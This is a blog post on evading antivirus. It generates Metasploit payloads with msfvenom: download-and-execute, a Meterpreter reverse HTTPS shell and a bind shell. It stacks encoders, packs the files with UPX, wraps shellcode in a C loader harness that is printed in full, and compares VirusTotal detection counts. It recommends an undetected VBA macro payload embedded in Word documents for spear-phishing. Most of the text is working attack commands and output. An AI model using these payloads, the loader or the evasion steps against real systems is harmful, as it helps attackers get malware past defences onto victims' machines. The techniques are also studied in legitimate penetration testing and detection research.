Using shellcode execution as a possible antivirus bypass technique.


Ok, first off, we need to create our malicious "shellcode payload". Below are three examples of payloads we could be using.

1. Download and execute.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

2. Reverse Meterpreter HTTPS shell

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

3. Standard Bind Shell

msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

These are the three payloads I will be testing. The encoders were chosen at random; I just went with the combination that "felt right". I will not be running them, just uploading them to VirusTotal to compare them with their .exe outputs. Binary size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".

One caveat on those command lines: msfvenom keeps a single encoder and a single iteration count, so when -e and -i are repeated the last pair wins, and the chains above effectively run x86/jmp_call_additive for 5 iterations. To really stack encoders you have to feed the raw output of one msfvenom run into a second one (current msfvenom reads a custom payload from stdin with -p -). Also keep in mind that these encoders exist to avoid bad characters, not to evade AV; the shikata_ga_nai decoder stub in particular is heavily signatured.

Step One: Download and Execute Payload.

Here is the command we will use to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe

So. We got our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: dlexec.exe
Filesize: 72.1 KB
MD5 Hash: aeace18d84af11640a219b2b557ee8ee
Packing: No UPX used.
Detections: 32/42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/

Next up we UPX it with this command: upx -9 dlexec.exe

Filesize: 47.0KB
MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
Detections: 27/43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/

Now, we redo the whole thing with the shellcode-exec method, which should be detected a LOT less.

First, we create our shellcode:

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

Now, we drop the buffer into our shellcode harness (meta.c)...
And cross-compile it with mingw: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe

Filename: dlcrypt.exe
Filesize: 20.1KB
MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
Packing: No UPX used.
Detections: 14 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/

As you can see, it is a far smaller file with far fewer detections. Let's UPX it and see what happens next...

Filename: dlcrypt.exe
Filesize: 14.1 KB
MD5 Hash: 03d634dde3d1e573d99776009e8567f5
Packing: UPX used.
Detections: 18 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/

It would appear UPX is counterproductive to bypassing AV (packers normally are: UPX sections are trivially recognisable and are themselves a heuristic flag for many engines), so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter reverse HTTPS payload.


Ok. Reverse HTTPS payload time!

Here is the command we will use to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse HTTPS Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe

So. We got our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: payload.exe
Filesize: 72.1 KB
MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
Packing: No UPX used.
Detections: 30 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/

Next up, we UPX

Filename: payload.exe
Filesize: 47.0 KB
MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
Packing: UPX used.
Detections: 26 / 42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/

As you can see, UPX had a positive effect this time. Then I noticed something bloody amazing in the MSFVENOM manual:

exe-small output.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe

No encoding used this time, BTW.

Filename: payload.exe
Filesize: 4.5 KB
MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
Packing: None
Detections: 13 / 43
Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/

So, let's add some encoding and see what happens...

##

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe

https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/

More detected? WTF? Fine, let's move on...


##

Now I started looking into alternative output formats, and came up with this.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe

Filename: vba.exe
Filesize: 290.2 KB
MD5 Hash: aedde86916de88b856b22c6e384901bb
Packing: None
Detections: 0 / 42
Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/

This is an MS Office macro payload. Open the output in a text editor and follow the instructions in its header: it is split into the macro itself, which goes into the document's VBA editor, and a hex data block that must be appended to the end of the document text.

Final notes: the MS Office macro payload is likely the most promising of the lot, as it can be embedded directly into an MS Word document for spear-phishing attacks, and it scored 0 here. Bear in mind, though, what was actually scanned: a text file of VBA source with an .exe extension. The engines were not looking at a macro-enabled document, so this result says nothing about how the finished .doc will fare; that is the file that needs to be scanned before drawing conclusions.

Now for ONE LAST TRY: Objdump Pwnage.

root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
root@shinigami:/tmp# chmod +x xxd-shellcode.sh
root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe
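The harness itself is never shown on this page (meta.c in step one, sc.c here), so the following is an added example of what such a shellcode harness looks like in C. It is my illustration, not infodox's file. parse_hex_escapes() reads the "\x.." text that msfvenom -f c (or xxd-shellcode.sh) prints, and run_shellcode() copies the bytes into fresh memory, makes it executable and jumps to it. The function names are my own, and the embedded "shellcode" is a constructed stub (mov eax, 42 ; ret) rather than a real payload, so the program can be built and run safely with gcc on Linux as well as with i586-mingw32msvc-gcc for Windows. One caveat the xxd step above needs: a harness like this only works for position-independent shellcode. sc.txt is the whole micro.exe, a PE file, so jumping to its first byte would execute the MZ header, not the payload; that variant only changes what the scanner sees.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif
#endif

/* Parse every "\xNN" escape in text into out (at most cap bytes).
 * Quotes, newlines and the "unsigned char buf[] =" prefix are skipped, so
 * msfvenom -f c output or xxd-shellcode.sh lines can be pasted in verbatim.
 * Returns the number of bytes written. */
size_t parse_hex_escapes(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;
    const char *p = text;

    while (n < cap && (p = strstr(p, "\\x")) != NULL) {
        if (isxdigit((unsigned char)p[2]) && isxdigit((unsigned char)p[3])) {
            char hex[3] = { p[2], p[3], '\0' };
            out[n++] = (unsigned char)strtoul(hex, NULL, 16);
            p += 4;
        } else {
            p += 2;   /* malformed escape: skip it rather than guess a byte */
        }
    }
    return n;
}

/* The stub bytes below are x86 machine code; refuse to jump into them elsewhere. */
int shellcode_arch_supported(void)
{
#if defined(__i386__) || defined(__x86_64__) || defined(_M_IX86) || defined(_M_X64)
    return 1;
#else
    return 0;
#endif
}

/* Copy sc into fresh memory, flip it from RW to RX (never RWX), call it and
 * return whatever it returns; -1 if memory could not be prepared or the
 * architecture does not match. A real msfvenom payload never returns; the
 * constructed stub does, which is what makes this harness testable. */
int run_shellcode(const unsigned char *sc, size_t len)
{
    int (*entry)(void);
    int rc;

    if (!shellcode_arch_supported() || len == 0)
        return -1;
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL)
        return -1;
    memcpy(mem, sc, len);
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return -1;
    }
    memcpy(&entry, &mem, sizeof entry);   /* data pointer -> function pointer */
    rc = entry();
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, sc, len);
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return -1;
    }
    memcpy(&entry, &mem, sizeof entry);   /* data pointer -> function pointer */
    rc = entry();
    munmap(mem, len);
#endif
    return rc;
}

/* Constructed sample in the exact shape "msfvenom ... -f c" prints. The bytes
 * are "mov eax, 42 ; ret" (valid in 32- and 64-bit mode), not a payload. */
static const char *const SAMPLE_C_OUTPUT =
    "unsigned char buf[] = \n"
    "\"\\xb8\\x2a\\x00\\x00\\x00\"\n"
    "\"\\xc3\";\n";

/* Parse the sample and run it: 42 on x86, -1 where the stub cannot run,
 * -2 if the parser did not reproduce the six expected bytes. */
int demo(void)
{
    unsigned char sc[4096];
    size_t len = parse_hex_escapes(SAMPLE_C_OUTPUT, sc, sizeof sc);

    if (len != 6 || sc[0] != 0xb8 || sc[1] != 0x2a || sc[5] != 0xc3)
        return -2;
    return run_shellcode(sc, len);
}

int main(void)
{
    int rc = demo();
    printf("stub returned %d\n", rc);
    return rc == 42 ? 0 : 1;
}
```

To use it for real, paste the msfvenom output in place of SAMPLE_C_OUTPUT (or read it from a file) and build with i586-mingw32msvc-gcc as above. The RW-then-RX sequence is deliberate: an RWX allocation is one of the more common heuristic flags, so even a test harness should avoid it.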

So now we scan our new binary and see how "bypassing" it is. We can take this further, BTW... (Remember that sc.txt is the entire micro.exe dumped as bytes, i.e. a PE file rather than position-independent shellcode; it would not run as shellcode, and as stated at the start, none of these are being executed, only scanned.)

MD5: 7642f0914ebbe62ddc8d64ffe7d52783
File size: 24.1 KB ( 24650 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 43
Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/

Next, we UPX it...

MD5: 963253a72210eb8bd7155137713112ba
File size: 16.6 KB ( 16970 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 41
Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/

So then I take this variant, pretend it is micro.exe, and run it back through the same xxd-shellcode.sh and harness step...

Result?

PRE UPX:
MD5: a34d634236388762de0801acdd587cc9
File size: 36.1 KB ( 36938 bytes )
File name: helloshell2.exe
File type: Win32 EXE
Detection ratio: 5 / 43
Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/

POST UPX:
Detections: 10 / 42
Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/


root@shinigami:/tmp# exit


I went up to 10 iterations with no real advantage, but perhaps alternating extra encoders (shikata_ga_nai) may help. I will investigate this later.

~infodox

Posted 2019-06-10 16:29 by heycomputer